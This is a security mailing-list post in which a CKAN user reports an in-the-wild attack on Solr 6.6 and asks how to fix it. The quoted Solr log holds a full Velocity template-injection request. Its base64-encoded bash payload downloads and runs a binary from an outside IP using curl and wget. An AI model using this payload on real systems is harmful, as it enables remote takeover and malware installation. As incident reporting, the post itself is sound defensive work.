[CKAN-Security] Vulnerability in the WIld

Fabian Fink fink at h0st.space
Wed Nov 6 15:36:07 UTC 2019 

Ckan 2.8.x
Solr 6.6.x
Solr Logs:
 webapp=/solr path=/select
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
hits=0 status=0 QTime=0

any version unaffected?
how could we fix it?

-- 
You received this message because you are subscribed to the Google Groups "CKAN Security" group.
To unsubscribe from this group and stop receiving emails from it, send an email to security+unsubscribe at ckan.org.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20191106/f32afd35/attachment.html>

More information about the Security mailing list